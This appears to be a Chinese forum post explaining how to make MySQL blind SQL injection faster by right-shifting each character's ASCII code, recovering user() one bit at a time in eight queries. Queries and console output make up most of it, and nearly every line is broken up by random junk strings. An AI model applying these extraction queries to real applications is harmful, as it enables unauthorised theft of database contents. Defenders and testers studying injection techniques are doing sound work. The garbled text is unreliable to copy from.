关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位


4 ~* i) {# f2 z% W$ j2 e: A
下面将以查询mysql数据库当中user()的第一位为例:
0 R! m  b# }1 f( q

; r( n9 j8 G# t, s# h
ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
, E& Z, H  p2 N8 j


! Q* D4 \4 \( m0 M3 ]首先执行如下sql语句:



+ n0 G& f( V) A1 bmysql> select (ascii((substr(user(),1,1))) >> 7)=0;



9 @1 A0 O% o! l  f( x+ n4 f我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

5 F  h1 m2 D. f

9 s9 B* b6 t) D) u/ k3 X- m第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1


2 f$ O1 }7 ?$ x6 m$ x
如果运算结果为1,说明第一位为0,不为1



- X$ B( e& O! J8 R$ s4 N0 \+————————————–+

5 r  B) f# d+ e, b* W( p| (ascii((substr(user(),1,1))) >> 7)=0 |

+ m" N8 U. {# H: z7 `* G" y+————————————–+
( }0 X+ [1 b& m7 g# w+ m* i
| 1 |
/ m3 o4 |% ^9 @) I- Z) a
$ ^/ c" e; W' d+————————————–+
2 ^6 i. W% D, r! U) }
1 row in set (0.00 sec)
" V3 a3 Z1 z+ v+ A3 B$ V  n+ T
这样我们就确定这个8bit的ascii的第一位为0
# |$ q; ?  J6 h1 M

; i' q) X4 E6 t3 w9 g- Q5 o8 v
第二次我们来做6次右偏移来确定前两位
5 L, }" \4 _. \% k
" \( [; w0 W& n
/ A6 L/ }* M' D* d; X# ^2 ^' e
前两位可能是01或00,即依然可以与0做比较,

2 d, j2 Y" N  Jmysql> select (ascii((substr(user(),1,1))) >> 6)=0;

# P! i9 a3 D8 ?6 ?+————————————–+

4 R1 |( _9 c# Q0 Y| (ascii((substr(user(),1,1))) >> 6)=0 |
( v, u  l# k2 H' o. b
+————————————–+
0 S3 w+ j1 m( ~5 ^
5 Z; [1 l' B# z" z: z/ i| 0 |
% {- Q0 P! u0 A" R
& `' S% \6 f; i, A- x+————————————–+

; }. R% J6 l' |1 row in set (0.00 sec)

! L( f" B1 @6 V% H8 m8 `

结果为0,即第二位为1

9 N4 V" \9 N6 n5 m' b
# [9 }2 Z; w3 k
开始猜测前三位为010或011

( z" S8 K1 _0 P' \: H
9 x1 M! e; U- w0 ^. `! c
3 f6 G* T9 f. w6 h, _让我们看看010和011的ascii码是多少
; d6 @8 X  b) ]3 W* d+ E% S+ p
4 k: o3 Z8 s( S! t: [. P

( [. l9 u- W+ L1 S; Y+ W分别查询select b’011′ select b’010′
0 Y( C5 Q# u0 \% p3 G  e7 V
& j( b; V5 ^4 Y

/ r& O- z% |4 M% m5 Z* I% M获得结果 010 = 2 011 = 3



执行如下sql:
6 r2 G4 b* [, T. \4 q2 V
8 {0 Q; ~* M- i
) G- t4 |( b& N) u  }/ T% T
( s; b' h5 D+ d& D0 dmysql> select (ascii((substr(user(),1,1))) >> 5)=2;

1 j7 Q; H& y( U, t5 f" u$ U+————————————–+
" R: E& D+ n" N: y
" B) D, S6 a# I. V) G( W| (ascii((substr(user(),1,1))) >> 5)=2 |

+————————————–+

| 0 |

+————————————–+

- ^; ?3 s1 h4 X. k4 V即前三位不为010,而是011

! Q/ o. }* t0 |/ A$ {' [9 X5 y' q

直到获得最后一位
$ H1 Y% I' ^& y8 T. b: Q& y
! H' I) M# Z' g9 |
& z) `) P9 D, x$ R
最终结果为:01110010

+ v( E' ]" X3 F* I5 m' f- e4 w; g

. I% c% M/ d5 Y0 i转换一下:
1 H. e; J. Y- f; r2 L# ?, A+ J; }! a
* H8 h. O  G1 A6 L

9 _# H8 _2 B, J9 I4 i! a& |# sselect b’01110010′
/ W# P; Q4 O# e$ i& H


查询结果
# U: F8 P! f2 q$ D
- `+ X, o1 K4 M! }5 ?. P
- |: p, o6 Y5 ]5 s% j# I1 ~
+————-+

! n7 T9 i' X5 |- ]; ?, l| b’01110010′ |
: Y- b2 X! K7 c9 }
) a- d6 t/ n& w+————-+
# t- G: Z9 r1 d! g
7 r1 x( |% x) g( || r |
& b/ q5 C4 `9 ~- N: W
" a6 I! ]" {# G. f. v1 Q7 z+————-+

4 R5 [- x% D/ e1 row in set (0.00 sec)


$ o6 N$ D/ I9 o! X1 w. |1 q
" }# f) e) n3 \, T' _1 T这样我们就获得了user()的第一位.其它位依此类推
: j# L6 h% E3 t9 x" _! |, Q